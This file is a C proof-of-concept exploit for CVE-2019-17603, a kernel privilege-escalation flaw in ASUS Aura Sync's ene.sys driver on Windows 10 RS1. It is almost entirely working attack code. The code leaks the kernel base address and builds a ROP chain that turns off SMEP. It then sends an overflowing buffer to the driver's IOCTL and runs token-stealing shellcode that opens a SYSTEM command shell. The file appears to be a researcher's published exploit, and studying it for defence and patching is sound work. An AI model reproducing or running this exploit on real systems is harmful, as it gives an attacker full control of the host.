ASUS Aura Sync version 1.07.71 ene.sys privilege escalation kernel exploit.
dd506cd09fc47f7ec526c55db6959c62// CVE-2019-17603: ASUS Aura Sync 1.07.71 'ene.sys' EoP Kernel Exploit
// Discovered by @dhn_
// Author of PoC: Connor McGarr (@33y0re - https://connormcgarr.github.io)
// Windows 10 RS1 Version 10.0.14393 Build 14393
// Tested with VBS, HyperGuard, and PatchGuard disabled
#include <stdio.h>
#include <Windows.h>
#include <Psapi.h>
// Vulnerable IOCTL in ene.sys
#define IOCTL_CODE 0x80102040
unsigned long long kernelBase()
{
// Defining EnumDeviceDrivers() parameters
LPVOID lpImageBase[1024];
DWORD lpcbNeeded;
// Calling EnumDeviceDrivers()
printf("[+] Calling EnumDeviceDrivers()...\n");
BOOL baseofDrivers = EnumDeviceDrivers(
lpImageBase,
sizeof(lpImageBase),
&lpcbNeeded
);
// Error handling
if (!baseofDrivers)
{
printf("[-] Error! Unable to invoke EnumDeviceDrivers(). Error: %d\n", GetLastError());
exit(1);
}
// ntoskrnl.exe is the first module dumped in the array
// Typcasting LPVOID to unsigned long long
unsigned long long krnlBase = (unsigned long long)lpImageBase[0];
// Print update for kernel base
printf("[+] Found kernel leak!\n");
printf("[+] ntoskrnl.exe is located at: 0x%llx\n", krnlBase);
return krnlBase;
}
void exploitWork(void)
{
/*
[BITS 64]
_start:
mov rax, [gs:0x188] ; Current thread (_KTHREAD)
mov rax, [rax + 0xb8] ; Current process (_EPROCESS)
mov rbx, rax ; Copy current process (_EPROCESS) to rbx
__loop:
mov rbx, [rbx + 0x2e8] ; ActiveProcessLinks
sub rbx, 0x2e8 ; Go back to current process (_EPROCESS)
mov rcx, [rbx + 0x2e0] ; UniqueProcessId (PID)
cmp rcx, 4 ; Compare PID to SYSTEM PID
jnz __loop ; Loop until SYSTEM PID is found
mov rcx, [rbx + 0x358] ; SYSTEM token is @ offset _EPROCESS + 0x358
and cl, 0xf0 ; Clear out _EX_FAST_REF RefCnt
mov [rax + 0x358], rcx ; Copy SYSTEM token to current process
xor rax, rax ; STATUS_SUCCESS
add rsp, 0xa0 ; Restore execution
ret ; Done!
*/
char payload[] = "\x65\x48\x8B\x04\x25\x88\x01\x00\x00\x48\x8B\x80"
"\xB8\x00\x00\x00\x48\x89\xC3\x48\x8B\x9B\xF0"
"\x02\x00\x00\x48\x81\xEB\xF0\x02\x00\x00\x48"
"\x8B\x8B\xE8\x02\x00\x00\x48\x83\xF9\x04"
"\x75\xE5\x48\x8B\x8B\x58\x03\x00\x00\x80"
"\xE1\xF0\x48\x89\x88\x58\x03\x00\x00\x48\x31\xC0"
"\x48\x81\xC4\xA0\x00\x00\x00\xC3";
// Allocating shellcode in user mode
LPVOID shellcode = VirtualAlloc(
NULL,
sizeof(payload),
0x3000,
0x40
);
// Error handling
if (!shellcode)
{
printf("[-] Error! Unable to allocate shellcode in user mode. Error: %d\n", GetLastError());
exit(1);
}
// Print statement for exploit
printf("[+] CVE-2019-17603: ASUS Aura Sync 1.07.71 'ene.sys' EoP Kernel Exploit\n");
// Print update for shellcode location
printf("[+] Shellcode allocated at: 0x%llx\n", shellcode);
// Moving memory into allocated space in user mode
RtlMoveMemory(
shellcode,
payload,
sizeof(payload)
);
// Running kernelBase() here to get base of kernel for ROP gadgets
unsigned long long baseAddress = kernelBase();
// Defining buffer and buffer size to send to the driver
char buf [88];
size_t gadgetSize = 0x8;
// ROP gadgets are for Windows 10 RS1 Version 10.0.14393 Build 14393
// Run rp++ on the target before execution to adjust offsets accordingnly
// rp++.exe -f C:\Windows\system32\ntoskrnl.exe -r 5 >> NTOSKRNL_GADGETS.exe
// Defining ROP gadgets
unsigned long long ROP1 = baseAddress + 0x4666b; // pop rcx ; ret: ntoskrnl.exe
unsigned long long ROP2 = 0x70678; // Intended CR4 value (0x70678) Windows 10 RS1 Version 10.0.14393 Build 14393
unsigned long long ROP3 = baseAddress + 0x1d87d7; // mov cr4, rcx ; ret: ntoskrnl.exe
// Using memset to copy memory into array
memset(buf, 0x41, 88);
// Print update for ROP chain
printf("[+] Exedcuting ROP chain to disable SMEP...\n");
memcpy(&buf[56], &ROP1, gadgetSize);
memcpy(&buf[56+8], &ROP2, gadgetSize);
memcpy(&buf[56+16], &ROP3, gadgetSize);
memcpy(&buf[56+24], &shellcode, 0x8);
// Obtaining handle to the driver
printf("[+] Obtaining handle to the driver via CreateFileA()...\n");
HANDLE drvHandle = CreateFileA(
"\\\\.\\EneIo",
0xC0000000,
0x0,
NULL,
0x3,
0x0,
NULL
);
// Error handling
if (!drvHandle)
{
printf("[-] Error! Unable to obtain a handle to the driver. Error: %d\n", GetLastError());
exit(1);
}
// Print update for HANDLE
printf("[+] Handle to the driver: %d\n", drvHandle);
// Sending buffer to the driver
// Defining lpBytesReturned parameter
DWORD lpBytesReturned;
// Invoking IOCTL routine
BOOL sendIoctl = DeviceIoControl(
drvHandle,
IOCTL_CODE,
buf,
sizeof(buf),
NULL,
0,
&lpBytesReturned,
NULL
);
// Error handling
if (!sendIoctl)
{
printf("[-] Error! Unable to interact with the driver. Error: %d\n", GetLastError());
exit(1);
}
printf("[+] Interacting with the driver...\n");
}
int main(int argc, char *argv[])
{
exploitWork();
// Print update for NT AUTHORITY\SYSTEM shell
printf("[+] Enjoy the NT AUTHORITY\\SYSTEM shell!\n");
// Spawning an NT AUTHORITY\SYSTEM shell
system("cmd.exe /c cmd.exe /K cd C:\\");
return 0;
}